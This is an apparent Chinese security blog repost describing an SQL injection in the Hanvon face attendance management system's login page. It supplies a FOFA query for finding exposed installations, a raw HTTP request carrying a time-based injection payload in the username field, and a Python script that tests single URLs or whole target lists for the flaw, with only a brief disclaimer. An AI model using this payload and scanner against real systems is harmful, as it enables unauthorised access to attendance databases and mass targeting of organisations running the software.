汉王人脸考勤管理系统

admin

139584
文章

114
评论

2024年10月13日21:44:41评论103 views字数 2246阅读7分29秒阅读模式

漏洞简介

汉王考勤管理系统简化版是是汉王人脸通考勤机的配套软件，满足客户的日常基本使用需要。汉王考勤管理系统第一次使用，需要完成一些例如服务器设置、员工信息、考勤规则、单位班次及员工排班等基本设置。该软件存在SQL注入，可获取数据库敏感信息。

FOFA语句

"汉王人脸考勤管理系统"

影响范围

汉王人脸考勤管理系统

漏洞复现

在登录框处抓包验证

poc

POST /Login/Check HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 50Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://xxx.xxx.xxx.xxxReferer: http://xxx.xxx.xxx.xxxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqbConnection: closestrName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd

如果返回ok，说明存在SQL注入

汉王人脸考勤管理系统

python脚本

import requestsimport sysimport argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告def lemonlove7():    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')    print('python xxx.py -f/--file x.txt')    print('FOFA:"汉王人脸考勤管理系统"')    print('lemonlove7')if len(sys.argv)==1:    lemonlove7()    sys.exit()p = argparse.ArgumentParser(description='lemonlove7')p.add_argument('-u','--url',help='输入url',default='')p.add_argument('-f','--file',help='输入文件',default='')a = p.parse_args()url = a.urlfile = a.fileheaders= {    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',    'Cookie':'ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb'}data="strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd"if url != '':    furl = url    try:        url =furl+'/Login/Check/'        r= requests.post(url=url,headers=headers,data=data,timeout=10,verify=False)        if r.status_code == 200 and 'ok' in r.text:            print(furl+'存在sql注入')        else:            print(furl+'不存在sql注入')    except Exception as e:        print(furl+'不存在sql注入')if file !='':    text =file    f = open(text,'r+')    for i in f.readlines():        url = i.strip()        if url.startswith('http:') != 1 and url.startswith('https:') != 1:            url = 'http://' + url        url1 = url        url2=url        try:            url1 = url+'/Login/Check/'            r =requests.post(url=url1,headers=headers,data=data,timeout = 10,verify=False)            if r.status_code==200 and 'ok' in r.text:                print(url2+'存在sql注入')            else:                print(url2+'不存在sql注入')        except Exception as e:            print(url2+'不存在sql注入')

运行效果如下：

汉王人脸考勤管理系统

原文始发于微信公众号（鹏组安全）：汉王人脸考勤管理系统

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

汉王人脸考勤管理系统

利用虚假 GIF 进行多阶段反向代理卡盗刷攻击

挖洞日记 | 某高校旁站到统一认证, 怒刷30+rank

LetMeowIn - 凭证转储程序分析

CVE-2025-24054 遭受主动攻击 - 文件下载时窃取 NTLM 凭证

【渗透测试】doubletrouble: 1靶场渗透测试

Telnet 渗透测试（端口 23）

分享常见的逻辑漏洞挖掘方法（第二部分）

同步漏洞行动：朝鲜Lazarus APT组织针对韩国供应链发起攻击

Vulnhub-zico2靶机教学

使用 PowerShell 中的动态 API 解析绕过 AMSI

发表评论

在线咨询

微信